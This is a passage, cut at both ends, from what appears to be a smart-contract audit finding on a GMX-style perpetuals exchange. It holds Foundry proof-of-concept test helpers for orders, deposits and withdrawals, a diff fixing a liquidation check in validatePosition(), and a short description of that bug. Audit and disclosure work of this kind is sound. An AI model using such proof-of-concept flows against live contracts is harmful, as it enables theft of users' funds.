swapPath;\\n \\n //address[] memory swapPath = new address[](3);\\n //swapPath[0] = _marketPropsAB.marketToken;\\n //swapPath[1] = _marketPropsBC.marketToken;\\n //swapPath[2] = _marketPropsCwnt.marketToken;\\n\\n \\n vm.prank(account); \\n _wnt.transfer(address(_orderVault), 3200); // execution fee\\n\\n\\n BaseOrderUtils.CreateOrderParams memory params;\\n params.addresses.receiver = account;\\n params.addresses.callbackContract = address(0);\\n params.addresses.uiFeeReceiver = uiFeeReceiver;\\n params.addresses.market = marketToken; // final market\\n params.addresses.initialCollateralToken = collateralToken; // initial token\\n params.addresses.swapPath = swapPath;\\n\\n params.numbers.sizeDeltaUsd = sizeDeltaUsd;\\n // params.numbers.initialCollateralDeltaAmount = ; // this is actually useless, will be overidden by real transfer amount\\n vm.prank(account); \\n IERC20(collateralToken).transfer(address(_orderVault), collateralAmount); // this is the real amount\\n\\n\\n params.numbers.triggerPrice = triggerPrice;\\n params.numbers.acceptablePrice = acceptablePrice; // I can buy with this price or lower effective spread control \\n params.numbers.executionFee = 3200;\\n params.numbers.callbackGasLimit = 3200;\\n params.numbers.minOutputAmount = 100; // use the control the final collateral amount, not for the position size delta, which is indirectly controlled by acceptable price\\n\\n params.orderType = Order.OrderType.Liquidation;\\n params.decreasePositionSwapType = Order.DecreasePositionSwapType.NoSwap;\\n params.isLong = isLong;\\n params.shouldUnwrapNativeToken = false;\\n params.referralCode = keccak256(abi.encode(""MY REFERRAL""));\\n\\n vm.prank(account);\\n bytes32 key = _erouter.createOrder(params);\\n return key;\\n} \\n\\n\\n\\nfunction createStopLossDecrease(address account, address marketToken, address collateralToken, uint256 collateralAmount, uint sizeDeltaUsd, uint triggerPrice, uint256 acceptablePrice, bool isLong) public returns(bytes32)\\n{\\n address[] memory swapPath;\\n \\n //address[] memory swapPath = new address[](3);\\n //swapPath[0] = _marketPropsAB.marketToken;\\n //swapPath[1] = _marketPropsBC.marketToken;\\n //swapPath[2] = _marketPropsCwnt.marketToken;\\n\\n \\n vm.prank(account); \\n _wnt.transfer(address(_orderVault), 3200); // execution fee\\n\\n\\n BaseOrderUtils.CreateOrderParams memory params;\\n params.addresses.receiver = account;\\n params.addresses.callbackContract = address(0);\\n params.addresses.uiFeeReceiver = uiFeeReceiver;\\n params.addresses.market = marketToken; // final market\\n params.addresses.initialCollateralToken = collateralToken; // initial token\\n params.addresses.swapPath = swapPath;\\n\\n params.numbers.sizeDeltaUsd = sizeDeltaUsd;\\n // params.numbers.initialCollateralDeltaAmount = ; // this is actually useless, will be overidden by real transfer amount\\n vm.prank(account); \\n IERC20(collateralToken).transfer(address(_orderVault), collateralAmount); // this is the real amount\\n\\n\\n params.numbers.triggerPrice = triggerPrice;\\n params.numbers.acceptablePrice = acceptablePrice; // I can buy with this price or lower effective spread control \\n params.numbers.executionFee = 3200;\\n params.numbers.callbackGasLimit = 3200;\\n params.numbers.minOutputAmount = 100; // use the control the final collateral amount, not for the position size delta, which is indirectly controlled by acceptable price\\n\\n params.orderType = Order.OrderType.StopLossDecrease;\\n params.decreasePositionSwapType = Order.DecreasePositionSwapType.NoSwap;\\n params.isLong = isLong;\\n params.shouldUnwrapNativeToken = false;\\n params.referralCode = keccak256(abi.encode(""MY REFERRAL""));\\n\\n vm.prank(account);\\n bytes32 key = _erouter.createOrder(params);\\n return key;\\n} \\n\\n\\n\\nfunction createLimitDecreaseOrder(address account, address marketToken, address collateralToken, uint256 collateralAmount, uint sizeDeltaUsd, uint triggerPrice, uint256 acceptablePrice, bool isLong) public returns(bytes32)\\n{\\n address[] memory swapPath;\\n \\n //address[] memory swapPath = new address[](3);\\n //swapPath[0] = _marketPropsAB.marketToken;\\n //swapPath[1] = _marketPropsBC.marketToken;\\n //swapPath[2] = _marketPropsCwnt.marketToken;\\n\\n \\n vm.prank(account); \\n _wnt.transfer(address(_orderVault), 3200); // execution fee\\n\\n\\n BaseOrderUtils.CreateOrderParams memory params;\\n params.addresses.receiver = account;\\n params.addresses.callbackContract = address(0);\\n params.addresses.uiFeeReceiver = uiFeeReceiver;\\n params.addresses.market = marketToken; // final market\\n params.addresses.initialCollateralToken = collateralToken; // initial token\\n params.addresses.swapPath = swapPath;\\n\\n params.numbers.sizeDeltaUsd = sizeDeltaUsd;\\n // params.numbers.initialCollateralDeltaAmount = ; // this is actually useless, will be overidden by real transfer amount\\n vm.prank(account); \\n IERC20(collateralToken).transfer(address(_orderVault), collateralAmount); // this is the real amount\\n\\n\\n params.numbers.triggerPrice = triggerPrice;\\n params.numbers.acceptablePrice = acceptablePrice; // I can buy with this price or lower effective spread control \\n params.numbers.executionFee = 3200;\\n params.numbers.callbackGasLimit = 3200;\\n params.numbers.minOutputAmount = 100; // use the control the final collateral amount, not for the position size delta, which is indirectly controlled by acceptable price\\n\\n params.orderType = Order.OrderType.LimitDecrease;\\n params.decreasePositionSwapType = Order.DecreasePositionSwapType.NoSwap;\\n params.isLong = isLong;\\n params.shouldUnwrapNativeToken = false;\\n params.referralCode = keccak256(abi.encode(""MY REFERRAL""));\\n\\n vm.prank(account);\\n bytes32 key = _erouter.createOrder(params);\\n return key;\\n} \\n\\n\\nfunction createLimitIncreaseOrder(address account, address marketToken, address collateralToken, uint256 collateralAmount, uint sizeDeltaUsd, uint triggerPrice, bool isLong) public returns(bytes32)\\n{\\n address[] memory swapPath;\\n \\n //address[] memory swapPath = new address[](3);\\n //swapPath[0] = _marketPropsAB.marketToken;\\n //swapPath[1] = _marketPropsBC.marketToken;\\n //swapPath[2] = _marketPropsCwnt.marketToken;\\n\\n \\n vm.prank(account); \\n _wnt.transfer(address(_orderVault), 3200); // execution fee\\n\\n\\n BaseOrderUtils.CreateOrderParams memory params;\\n params.addresses.receiver = account;\\n params.addresses.callbackContract = address(0);\\n params.addresses.uiFeeReceiver = uiFeeReceiver;\\n params.addresses.market = marketToken; // final market\\n params.addresses.initialCollateralToken = collateralToken; // initial token\\n params.addresses.swapPath = swapPath;\\n\\n params.numbers.sizeDeltaUsd = sizeDeltaUsd;\\n // params.numbers.initialCollateralDeltaAmount = ; // this is actually useless, will be overidden by real transfer amount\\n vm.prank(account); \\n IERC20(collateralToken).transfer(address(_orderVault), collateralAmount); // this is the real amount\\n\\n\\n params.numbers.triggerPrice = triggerPrice; // used for limit order\\n params.numbers.acceptablePrice = 121000000000000; // I can buy with this price or lower effective spread control \\n params.numbers.executionFee = 3200;\\n params.numbers.callbackGasLimit = 3200;\\n params.numbers.minOutputAmount = 100; // use the control the final collateral amount, not for the position size delta, which is indirectly controlled by acceptable price\\n\\n params.orderType = Order.OrderType.LimitIncrease;\\n params.decreasePositionSwapType = Order.DecreasePositionSwapType.NoSwap;\\n params.isLong = isLong;\\n params.shouldUnwrapNativeToken = false;\\n params.referralCode = keccak256(abi.encode(""MY REFERRAL""));\\n\\n vm.prank(account);\\n bytes32 key = _erouter.createOrder(params);\\n return key;\\n} \\n\\n\\n\\n\\nfunction createMarketDecreaseOrder(address account, address marketToken, address collateralToken, uint256 acceptablePrice, uint256 sizeInUsd, bool isLong) public returns(bytes32)\\n{\\n address[] memory swapPath;\\n \\n //address[] memory swapPath = new address[](3);\\n //swapPath[0] = _marketPropsAB.marketToken;\\n //swapPath[1] = _marketPropsBC.marketToken;\\n //swapPath[2] = _marketPropsCwnt.marketToken;\\n\\n \\n vm.prank(account); \\n _wnt.transfer(address(_orderVault), 3200); // execution fee\\n\\n\\n BaseOrderUtils.CreateOrderParams memory params;\\n params.addresses.receiver = account;\\n params.addresses.callbackContract = address(0);\\n params.addresses.uiFeeReceiver = uiFeeReceiver;\\n params.addresses.market = marketToken; // final market\\n params.addresses.initialCollateralToken = collateralToken; // initial token\\n params.addresses.swapPath = swapPath;\\n\\n params.numbers.sizeDeltaUsd = sizeInUsd; // how much dollar to decrease, will convert into amt of tokens to decrease in long/short based on the execution price\\n params.numbers.initialCollateralDeltaAmount = 13e18; // this is actually useless, will be overidden by real transfer amount\\n // vm.prank(account); \\n // IERC20(collateralToken).transfer(address(_orderVault), collateralAmount); // this is the real amount\\n\\n\\n params.numbers.triggerPrice = 0;\\n params.numbers.acceptablePrice = acceptablePrice; // I can buy with this price or lower effective spread control \\n params.numbers.executionFee = 3200;\\n params.numbers.callbackGasLimit = 3200;\\n params.numbers.minOutputAmount = 10e18; // use the control the final collateral amount, not for the position size delta, which is indirectly controlled by acceptable price\\n\\n params.orderType = Order.OrderType.MarketDecrease;\\n params.decreasePositionSwapType = Order.DecreasePositionSwapType.NoSwap;\\n params.isLong = isLong;\\n params.shouldUnwrapNativeToken = false;\\n params.referralCode = keccak256(abi.encode(""MY REFERRAL""));\\n\\n vm.prank(account);\\n bytes32 key = _erouter.createOrder(params);\\n return key;\\n} \\n\\n\\n\\nfunction createMarketIncreaseOrder(address account, address marketToken, address collateralToken, uint256 collateralAmount, uint sizeDeltaUsd, uint acceptablePrice, bool isLong) public returns(bytes32)\\n{\\n address[] memory swapPath;\\n \\n //address[] memory swapPath = new address[](3);\\n //swapPath[0] = _marketPropsAB.marketToken;\\n //swapPath[1] = _marketPropsBC.marketToken;\\n //swapPath[2] = _marketPropsCwnt.marketToken;\\n\\n \\n vm.prank(account); \\n _wnt.transfer(address(_orderVault), 3200); // execution fee\\n\\n\\n BaseOrderUtils.CreateOrderParams memory params;\\n params.addresses.receiver = account;\\n params.addresses.callbackContract = address(0);\\n params.addresses.uiFeeReceiver = uiFeeReceiver;\\n params.addresses.market = marketToken; // final market\\n params.addresses.initialCollateralToken = collateralToken; // initial token\\n params.addresses.swapPath = swapPath;\\n\\n params.numbers.sizeDeltaUsd = sizeDeltaUsd;\\n // params.numbers.initialCollateralDeltaAmount = ; // this is actually useless, will be overidden by real transfer amount\\n vm.prank(account); \\n IERC20(collateralToken).transfer(address(_orderVault), collateralAmount); // this is the real amount\\n\\n\\n params.numbers.triggerPrice = 0;\\n params.numbers.acceptablePrice = acceptablePrice; // I can buy with this price or lower effective spread control \\n params.numbers.executionFee = 3200;\\n params.numbers.callbackGasLimit = 3200;\\n params.numbers.minOutputAmount = 100; // use the control the final collateral amount, not for the position size delta, which is indirectly controlled by acceptable price\\n\\n params.orderType = Order.OrderType.MarketIncrease;\\n params.decreasePositionSwapType = Order.DecreasePositionSwapType.NoSwap;\\n params.isLong = isLong;\\n params.shouldUnwrapNativeToken = false;\\n params.referralCode = keccak256(abi.encode(""MY REFERRAL""));\\n\\n vm.prank(account);\\n bytes32 key = _erouter.createOrder(params);\\n return key;\\n} \\n\\n\\n\\nfunction createWithdraw(address withdrawor, uint marketTokenAmount) public returns (bytes32)\\n{\\n address[] memory longTokenSwapPath;\\n address[] memory shortTokenSwapPath;\\n\\n console.log(""createWithdraw with withdrawor: "");\\n console.logAddress(withdrawor);\\n vm.prank(withdrawor); \\n _wnt.transfer(address(_withdrawalVault), 3200); // execution fee\\n\\n vm.prank(withdrawor);\\n ERC20(_marketProps1.marketToken).transfer(address(_withdrawalVault), marketTokenAmount);\\n\\n WithdrawalUtils.CreateWithdrawalParams memory params = WithdrawalUtils.CreateWithdrawalParams(\\n withdrawor, // receiver\\n address(0), // call back function\\n uiFeeReceiver, // uiFeeReceiver\\n _marketProps1.marketToken, // which market token to withdraw\\n longTokenSwapPath,\\n shortTokenSwapPath,\\n 123, // minLongTokenAmount\\n 134, // minShortTokenAmount\\n false, // shouldUnwrapNativeToken\\n 3200, // execution fee\\n 3200 // callback gas limit\\n );\\n\\n vm.prank(withdrawor);\\n bytes32 key = _erouter.createWithdrawal(params);\\n return key;\\n}\\n\\n\\nfunction createDepositNoSwap(Market.Props memory marketProps, address depositor, uint amount, bool isLong) public returns (bytes32){\\n address[] memory longTokenSwapPath;\\n address[] memory shortTokenSwapPath;\\n\\n console.log(""createDeposit with depositor: "");\\n console.logAddress(depositor);\\n\\n vm.prank(depositor);\\n _wnt.transfer(address(_depositVault), 3200); // execution fee\\n if(isLong){\\n console2.log(""000000000000000000"");\\n vm.prank(depositor);\\n IERC20(marketProps.longToken).transfer(address(_depositVault), amount); \\n console2.log(""bbbbbbbbbbbbbbbbbbbbbb"");\\n }\\n else {\\n console2.log(""111111111111111111111111"");\\n console2.log(""deposit balance: %d, %d"", IERC20(marketProps.shortToken).balanceOf(depositor), amount);\\n vm.prank(depositor);\\n IERC20(marketProps.shortToken).transfer(address(_depositVault), amount);\\n console2.log(""qqqqqqqqqqqqqqqqqq"");\\n }\\n \\n\\n DepositUtils.CreateDepositParams memory params = DepositUtils.CreateDepositParams(\\n depositor,\\n address(0),\\n uiFeeReceiver,\\n marketProps.marketToken,\\n marketProps.longToken,\\n marketProps.shortToken,\\n longTokenSwapPath,\\n shortTokenSwapPath,\\n 100000, // minMarketTokens\\n true,\\n 3200, // execution fee\\n 3200 // call back gas limit\\n );\\n\\n console2.log(""aaaaaaaaaaaaaaaaaaaaaaaaa"");\\n vm.prank(depositor);\\n bytes32 key1 = _erouter.createDeposit(params);\\n\\n return key1;\\n}\\n\\n/*\\nfunction testCancelDeposit() public \\n{\\n address[] memory longTokenSwapPath;\\n address[] memory shortTokenSwapPath;\\n\\n address(_wnt).call{value: 100e8}("""");\\n _wnt.transfer(address(_depositVault), 1e6);\\n DepositUtils.CreateDepositParams memory params = DepositUtils.CreateDepositParams(\\n msg.sender,\\n address(0),\\n address(111),\\n _marketProps1.marketToken,\\n _marketProps1.longToken,\\n _marketProps1.shortToken,\\n longTokenSwapPath,\\n shortTokenSwapPath,\\n 100000, // minMarketTokens\\n true,\\n 3200, // execution fee\\n 3200 // call back gas limit\\n );\\n\\n bytes32 key1 = _erouter.createDeposit(params);\\n\\n console.log(""WNT balance of address(222) before cancelllation: %s"", _wnt.balanceOf(address(222)));\\n console.log(""WNT balance of address(this) before cancelllation: %s"", _wnt.balanceOf(address(this))); \\n\\n _roleStore.grantRole(address(222), Role.CONTROLLER); // to save a market's props\\n vm.prank(address(222));\\n _depositHandler.cancelDeposit(key1);\\n console.log(""WNT balance of address(222) after cancelllation: %s"", _wnt.balanceOf(address(222)));\\n console.log(""WNT balance of address(this) after cancelllation: %s"", _wnt.balanceOf(address(this))); \\n}\\n*/\\n\\nfunction testERC165() public{\\n bool yes = _wnt.supportsInterface(type(IWNT).interfaceId);\\n console2.log(""wnt suppports deposit?"");\\n console2.logBool(yes);\\n vm.expectRevert();\\n yes = IERC165(address(_sol)).supportsInterface(type(IWNT).interfaceId);\\n console2.logBool(yes);\\n\\n if(ERC165Checker.supportsERC165(address(_wnt))){\\n console2.log(""_wnt supports ERC165"");\\n }\\n if(ERC165Checker.supportsERC165(address(_sol))){\\n console2.log(""_sol supports ERC165"");\\n }\\n}\\n\\n function justError() external {\\n // revert Unauthorized(""abcdefg""); // 973d02cb\\n // revert(""abcdefg""); // 0x08c379a, Error selector\\n // require(false, ""abcdefg""); // 0x08ce79a, Error selector\\n assert(3 == 4); // Panic: 0x4e487b71\\n }\\n\\n function testErrorMessage() public{\\n\\n try this.justError(){} \\n catch (bytes memory reasonBytes) {\\n (string memory msg, bool ok ) = ErrorUtils.getRevertMessage(reasonBytes);\\n console2.log(""Error Message: ""); console2.logString(msg);\\n console2.log(""error?""); console2.logBool(ok);\\n } \\n }\\n\\n \\n function printAddresses() public{\\n console2.log(""_orderVault:""); console2.logAddress(address(_orderVault));\\n console2.log(""marketToken:""); console2.logAddress(address(_marketProps1.marketToken));\\n } \\n\\n function printPoolsAmounts() public{\\n console2.log(""\\n The summary of pool amounts: "");\\n \\n uint256 amount = MarketUtils.getPoolAmount(_dataStore, _marketProps1, _marketProps1.longToken);\\n console2.log(""Market: _marketProps1, token: long/nwt, amount: %d"", amount);\\n amount = MarketUtils.getPoolAmount(_dataStore, _marketProps1, _marketProps1.shortToken);\\n console2.log(""Market: _marketProps1, token: short/USDC, amount: %d"", amount);\\n \\n amount = MarketUtils.getPoolAmount(_dataStore, _marketPropsAB, _marketPropsAB.longToken);\\n console2.log(""Market: _marketPropsAB, token: long/A, amount: %d"", amount);\\n amount = MarketUtils.getPoolAmount(_dataStore, _marketPropsAB, _marketPropsAB.shortToken);\\n console2.log(""Market: _marketPropsAB, token: short/B, amount: %d"", amount);\\n \\n amount = MarketUtils.getPoolAmount(_dataStore, _marketPropsBC, _marketPropsBC.longToken);\\n console2.log(""Market: _marketPropsBC, token: long/B, amount:%d"", amount);\\n amount = MarketUtils.getPoolAmount(_dataStore, _marketPropsBC, _marketPropsBC.shortToken);\\n console2.log(""Market: _marketPropsBC, token: short/C, amount: %d"", amount);\\n \\n amount = MarketUtils.getPoolAmount(_dataStore, _marketPropsCwnt, _marketPropsCwnt.longToken);\\n console2.log(""Market: _marketPropsCwnt, token: long/C, amount: %d"", amount);\\n amount = MarketUtils.getPoolAmount(_dataStore, _marketPropsCwnt, _marketPropsCwnt.shortToken);\\n console2.log(""Market: _marketPropsCwnt, token: short/wnt, amount: %d"", amount);\\n \\n\\n console2.log(""\\n"");\\n }\\n \\n}\\n```\\n","Pass false always to isPositionLiquidatable():\\n```\\n function validatePosition(\\n DataStore dataStore,\\n IReferralStorage referralStorage,\\n Position.Props memory position,\\n Market.Props memory market,\\n MarketUtils.MarketPrices memory prices,\\n bool isIncrease,\\n bool shouldValidateMinPositionSize,\\n bool shouldValidateMinCollateralUsd\\n ) public view {\\n if (position.sizeInUsd() == 0 || position.sizeInTokens() == 0) {\\n revert Errors.InvalidPositionSizeValues(position.sizeInUsd(), position.sizeInTokens());\\n }\\n\\n MarketUtils.validateEnabledMarket(dataStore, market.marketToken);\\n MarketUtils.validateMarketCollateralToken(market, position.collateralToken());\\n\\n if (shouldValidateMinPositionSize) {\\n uint256 minPositionSizeUsd = dataStore.getUint(Keys.MIN_POSITION_SIZE_USD);\\n if (position.sizeInUsd() < minPositionSizeUsd) {\\n revert Errors.MinPositionSize(position.sizeInUsd(), minPositionSizeUsd);\\n }\\n }\\n\\n if (isPositionLiquidatable(\\n dataStore,\\n referralStorage,\\n position,\\n market,\\n prices,\\n// Remove the line below\\n isIncrease,\\n// Add the line below\\n false,\\n shouldValidateMinCollateralUsd\\n )) {\\n revert Errors.LiquidatablePosition();\\n }\\n }\\n```\\n","PositionUtils.validatePosition() uses `isIncrease` instead of `false` when calling isPositionLiquidatable(), making it not work properly for the case of `isIncrease` = true. A liquidation should always be considered as a decrease order in terms of evaluating price impact.","```\\n// SPDX-License-Identifier: MIT\\npragma solidity ^0.8.0;\\n\\nimport ""forge-std/Test.sol"";\\nimport ""../contracts/role/RoleStore.sol"";\\nimport ""../contracts/router/ExchangeRouter.sol"";\\nimport ""../contracts/data/DataStore.sol"";\\nimport ""../contracts/referral/ReferralStorage.sol"";\\n\\nimport ""../contracts/token/IWNT.sol"";\\nimport ""../contracts/token/WNT.sol"";\\nimport ""../contracts/token/SOLToken.sol"";\\nimport ""../contracts/token/USDC.sol"";\\nimport ""../contracts/token/tokenA.sol"";\\nimport ""../contracts/token/tokenB.sol"";\\nimport ""../contracts/token/tokenC.sol"";\\n\\nimport ""../contracts/market/MarketFactory.sol"";\\nimport ""../contracts/deposit/DepositUtils.sol"";\\nimport ""../contracts/oracle/OracleUtils.sol"";\\nimport ""@openzeppelin/contracts/utils/introspection/ERC165Checker.sol"";\\nimport ""../contracts/withdrawal/WithdrawalUtils.sol"";\\nimport ""../contracts/order/Order.sol"";\\nimport ""../contracts/order/BaseOrderUtils.sol"";\\nimport ""../contracts/price/Price.sol"";\\nimport ""../contracts/utils/Debug.sol"";\\nimport ""../contracts/position/Position.sol"";\\nimport ""../contracts/exchange/LiquidationHandler.sol"";\\nimport ""../contracts/utils/Calc.sol"";\\nimport ""@openzeppelin/contracts/utils/math/SignedMath.sol"";\\nimport ""@openzeppelin/contracts/utils/math/SafeCast.sol"";\\n\\n\\ncontract CounterTest is Test, Debug{\\n using SignedMath for int256;\\n using SafeCast for uint256;\\n\\n\\n WNT _wnt; \\n USDC _usdc;\\n SOLToken _sol;\\n tokenA _tokenA;\\n tokenB _tokenB;\\n tokenC _tokenC;\\n\\n RoleStore _roleStore;\\n Router _router;\\n DataStore _dataStore;\\n EventEmitter _eventEmitter;\\n DepositVault _depositVault;\\n OracleStore _oracleStore; \\n Oracle _oracle;\\n DepositHandler _depositHandler;\\n WithdrawalVault _withdrawalVault;\\n WithdrawalHandler _withdrawalHandler;\\n OrderHandler _orderHandler;\\n SwapHandler _swapHandler;\\n LiquidationHandler _liquidationHandler;\\n ReferralStorage _referralStorage;\\n OrderVault _orderVault;\\n ExchangeRouter _erouter;\\n MarketFactory _marketFactory;\\n Market.Props _marketProps1;\\n Market.Props _marketPropsAB;\\n Market.Props _marketPropsBC;\\n Market.Props _marketPropsCwnt;\\n \\n \\n address depositor1;\\n address depositor2;\\n address depositor3;\\n address uiFeeReceiver = address(333);\\n\\n\\n function testGetFundingAmountPerSizeDelta() public{\\n uint result = MarketUtils.getFundingAmountPerSizeDelta(2e15, 1e15+1, true);\\n console2.log(""result: %d"", result);\\n uint256 correctResult = 2e15 * 1e15 * 1e30 + 1e15; // this is a real round up\\n correctResult = correctResult/(1e15+1);\\n console2.log(""correctResult: %d"", correctResult);\\n assertTrue(result == 1e15 * 1e30);\\n }\\n\\n \\n\\n function setUp() public {\\n _wnt = new WNT();\\n _usdc = new USDC();\\n _sol = new SOLToken();\\n _tokenA = new tokenA();\\n _tokenB = new tokenB();\\n _tokenC = new tokenC();\\n \\n\\n\\n _roleStore = new RoleStore();\\n _router = new Router(_roleStore);\\n _dataStore = new DataStore(_roleStore);\\n \\n _eventEmitter= new EventEmitter(_roleStore);\\n _depositVault = new DepositVault(_roleStore, _dataStore);\\n _oracleStore = new OracleStore(_roleStore, _eventEmitter);\\n _oracle = new Oracle(_roleStore, _oracleStore);\\n console2.logString(""_oracle:""); console2.logAddress(address(_oracle));\\n \\n _depositHandler = new DepositHandler(_roleStore, _dataStore, _eventEmitter, _depositVault, _oracle);\\n console2.logString(""_depositHandler:""); console2.logAddress(address(_depositHandler));\\n \\n\\n _withdrawalVault = new WithdrawalVault(_roleStore, _dataStore);\\n _withdrawalHandler = new WithdrawalHandler(_roleStore, _dataStore, _eventEmitter, _withdrawalVault, _oracle);\\n \\n \\n _swapHandler = new SwapHandler(_roleStore);\\n _orderVault = new OrderVault(_roleStore, _dataStore);\\n _referralStorage = new ReferralStorage();\\n\\n\\n \\n _orderHandler = new OrderHandler(_roleStore, _dataStore, _eventEmitter, _orderVault, _oracle, _swapHandler, _referralStorage); \\n _erouter = new ExchangeRouter(_router, _roleStore, _dataStore, _eventEmitter, _depositHandler, _withdrawalHandler, _orderHandler);\\n console2.logString(""_erouter:""); console2.logAddress(address(_erouter));\\n _liquidationHandler = new LiquidationHandler(_roleStore, _dataStore, _eventEmitter, _orderVault, _oracle, _swapHandler, _referralStorage);\\n \\n _referralStorage.setHandler(address(_orderHandler), true); \\n\\n /* set myself as the controller so that I can set the address of WNT (wrapped native token contracdt) */\\n _roleStore.grantRole(address(this), Role.CONTROLLER);\\n _roleStore.grantRole(address(this), Role.MARKET_KEEPER);\\n \\n _dataStore.setUint(Keys.MAX_SWAP_PATH_LENGTH, 5); // at most 5 markets in the path\\n \\n _dataStore.setAddress(Keys.WNT, address(_wnt));\\n\\n /* set the token transfer gas limit for wnt as 3200 */\\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_wnt)), 32000); \\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_usdc)), 32000); \\n \\n\\n /* create a market (SQL, WNT, ETH, USDC) */\\n _marketFactory = new MarketFactory(_roleStore, _dataStore, _eventEmitter);\\n console2.logString(""_marketFactory:""); console2.logAddress(address(_marketFactory));\\n _roleStore.grantRole(address(_marketFactory), Role.CONTROLLER); // to save a market's props\\n _roleStore.grantRole(address(_erouter), Role.CONTROLLER); \\n _roleStore.grantRole(address(_depositHandler), Role.CONTROLLER); \\n _roleStore.grantRole(address(_withdrawalHandler), Role.CONTROLLER); \\n _roleStore.grantRole(address(_swapHandler), Role.CONTROLLER);\\n _roleStore.grantRole(address(_orderHandler), Role.CONTROLLER); \\n _roleStore.grantRole(address(_liquidationHandler), Role.CONTROLLER); \\n _roleStore.grantRole(address(_oracleStore), Role.CONTROLLER); // so it can call EventEmitter\\n _roleStore.grantRole(address(_oracle), Role.CONTROLLER); // so it can call EventEmitter\\n _roleStore.grantRole(address(this), Role.ORDER_KEEPER);\\n _roleStore.grantRole(address(this), Role.LIQUIDATION_KEEPER);\\n\\n \\n _marketProps1 = _marketFactory.createMarket(address(_sol), address(_wnt), address(_usdc), keccak256(abi.encode(""sol-wnt-usdc""))); \\n _marketPropsAB = _marketFactory.createMarket(address(0), address(_tokenA), address(_tokenB), keccak256(abi.encode(""swap-tokenA-tokenB""))); \\n _marketPropsBC = _marketFactory.createMarket(address(0), address(_tokenB), address(_tokenC), keccak256(abi.encode(""swap-tokenB-tokenC""))); \\n _marketPropsCwnt = _marketFactory.createMarket(address(0), address(_tokenC), address(_wnt), keccak256(abi.encode(""swap-tokenC-wnt""))); \\n \\n \\n _dataStore.setUint(Keys.minCollateralFactorForOpenInterestMultiplierKey(_marketProps1.marketToken, true), 1e25);\\n _dataStore.setUint(Keys.minCollateralFactorForOpenInterestMultiplierKey(_marketProps1.marketToken, false), 1e25);\\n \\n // see fees for the market\\n _dataStore.setUint(Keys.swapFeeFactorKey(_marketProps1.marketToken), 0.05e30); // 5%\\n _dataStore.setUint(Keys.SWAP_FEE_RECEIVER_FACTOR, 0.5e30);\\n _dataStore.setUint(Keys.positionFeeFactorKey(_marketProps1.marketToken), 0.00001234e30); // 2%\\n _dataStore.setUint(Keys.POSITION_FEE_RECEIVER_FACTOR, 0.15e30);\\n _dataStore.setUint(Keys.MAX_UI_FEE_FACTOR, 0.01e30);\\n _dataStore.setUint(Keys.uiFeeFactorKey(uiFeeReceiver), 0.01e30); // only when this is set, one can receive ui fee, so stealing is not easy\\n _dataStore.setInt(Keys.poolAmountAdjustmentKey(_marketProps1.marketToken, _marketProps1.longToken), 1);\\n _dataStore.setInt(Keys.poolAmountAdjustmentKey(_marketProps1.marketToken, _marketProps1.shortToken), 1);\\n _dataStore.setUint(Keys.swapImpactExponentFactorKey(_marketProps1.marketToken), 10e28);\\n _dataStore.setUint(Keys.swapImpactFactorKey(_marketProps1.marketToken, true), 0.99e30);\\n _dataStore.setUint(Keys.swapImpactFactorKey(_marketProps1.marketToken, false), 0.99e30);\\n\\n \\n \\n \\n // set gas limit to transfer a token\\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_sol)), 32000); \\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_wnt)), 32000); \\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_usdc)), 32000); \\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_tokenA)), 32000); \\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_tokenB)), 32000); \\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_tokenC)), 32000); \\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_marketProps1.marketToken)), 32000); \\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_marketPropsAB.marketToken)), 32000);\\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_marketPropsBC.marketToken)), 32000);\\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_marketPropsCwnt.marketToken)), 32000);\\n\\n\\n /* Configure the system parameters/limits here */\\n _dataStore.setUint(Keys.MAX_CALLBACK_GAS_LIMIT, 10000);\\n _dataStore.setUint(Keys.EXECUTION_GAS_FEE_BASE_AMOUNT, 100);\\n _dataStore.setUint(Keys.MAX_ORACLE_PRICE_AGE, 2 hours);\\n _dataStore.setUint(Keys.MIN_ORACLE_BLOCK_CONFIRMATIONS, 3);\\n _dataStore.setUint(Keys.MIN_COLLATERAL_USD, 1e30); // just require $1 as min collateral usd\\n _dataStore.setUint(Keys.reserveFactorKey(_marketProps1.marketToken, true), 5e29); // 50%\\n _dataStore.setUint(Keys.reserveFactorKey(_marketProps1.marketToken, false), 5e29);\\n _dataStore.setUint(Keys.fundingExponentFactorKey(_marketProps1.marketToken), 1.1e30); // 2 in 30 decimals like a square, cube, etc\\n _dataStore.setUint(Keys.fundingFactorKey(_marketProps1.marketToken), 0.0000001e30);\\n _dataStore.setUint(Keys.borrowingFactorKey(_marketProps1.marketToken, true), 0.87e30);\\n _dataStore.setUint(Keys.borrowingFactorKey(_marketProps1.marketToken, false), 0.96e30);\\n _dataStore.setUint(Keys.borrowingExponentFactorKey(_marketProps1.marketToken, true), 2.1e30);\\n _dataStore.setUint(Keys.borrowingExponentFactorKey(_marketProps1.marketToken, false), 2.3e30);\\n _dataStore.setUint(Keys.positionImpactExponentFactorKey(_marketProps1.marketToken), 2e30);\\n _dataStore.setUint(Keys.positionImpactFactorKey(_marketProps1.marketToken, true), 5e22); \\n _dataStore.setUint(Keys.positionImpactFactorKey(_marketProps1.marketToken, false), 1e23);\\n\\n // set the limit of market tokens\\n\\n _dataStore.setUint(Keys.maxPoolAmountKey(_marketProps1.marketToken, _marketProps1.longToken), 1000e18);\\n _dataStore.setUint(Keys.maxPoolAmountKey(_marketProps1.marketToken, _marketProps1.shortToken), 1000e18);\\n _dataStore.setUint(Keys.maxPoolAmountKey(_marketPropsAB.marketToken, _marketPropsAB.longToken), 1000e18);\\n _dataStore.setUint(Keys.maxPoolAmountKey(_marketPropsAB.marketToken, _marketPropsAB.shortToken), 1000e18);\\n _dataStore.setUint(Keys.maxPoolAmountKey(_marketPropsBC.marketToken, _marketPropsBC.longToken), 1000e18);\\n _dataStore.setUint(Keys.maxPoolAmountKey(_marketPropsBC.marketToken, _marketPropsBC.shortToken), 1000e18);\\n _dataStore.setUint(Keys.maxPoolAmountKey(_marketPropsCwnt.marketToken, 